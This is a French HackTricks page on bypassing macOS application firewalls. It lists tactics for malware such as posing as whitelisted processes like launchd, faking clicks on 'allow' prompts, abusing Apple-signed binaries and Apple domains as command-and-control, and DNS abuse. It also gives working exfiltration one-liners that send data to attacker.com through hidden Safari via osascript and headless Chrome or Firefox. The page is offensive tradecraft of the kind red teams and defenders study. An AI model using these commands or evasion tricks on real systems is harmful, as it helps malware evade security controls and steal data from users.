4.6 KiB
Contournement des pare-feu macOS
Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!
Autres moyens de soutenir HackTricks :
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le merchandising officiel PEASS & HackTricks
- Découvrez La Famille PEASS, notre collection d'NFTs exclusifs
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-moi sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de hacking en soumettant des PR aux dépôts github HackTricks et HackTricks Cloud.
Techniques trouvées
Les techniques suivantes ont été trouvées fonctionnelles dans certaines applications de pare-feu macOS.
Abuser des noms de liste blanche
- Par exemple, nommer le malware avec des noms de processus macOS bien connus comme
launchd
Clic Synthétique
- Si le pare-feu demande la permission à l'utilisateur, faire en sorte que le malware clique sur autoriser
Utiliser des binaires signés par Apple
- Comme
curl, mais aussi d'autres commewhois
Domaines Apple bien connus
Le pare-feu pourrait autoriser les connexions vers des domaines Apple bien connus tels que apple.com ou icloud.com. Et iCloud pourrait être utilisé comme un C2.
Contournement Générique
Quelques idées pour essayer de contourner les pare-feu
Vérifier le trafic autorisé
Connaître le trafic autorisé vous aidera à identifier les domaines potentiellement en liste blanche ou quelles applications sont autorisées à y accéder
lsof -i TCP -sTCP:ESTABLISHED
Abus de DNS
Les résolutions DNS sont effectuées via l'application signée mdnsreponder qui sera probablement autorisée à contacter les serveurs DNS.
Via les applications de navigateur
- osascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
- Google Chrome
{% code overflow="wrap" %}
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
- Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
- Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
Via l'injection de processus
Si vous pouvez injecter du code dans un processus autorisé à se connecter à n'importe quel serveur, vous pourriez contourner les protections du pare-feu :
{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}
Références
Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!
Autres moyens de soutenir HackTricks :
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le merchandising officiel PEASS & HackTricks
- Découvrez La Famille PEASS, notre collection d'NFTs exclusifs
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-moi sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de hacking en soumettant des PR aux dépôts github HackTricks et HackTricks Cloud.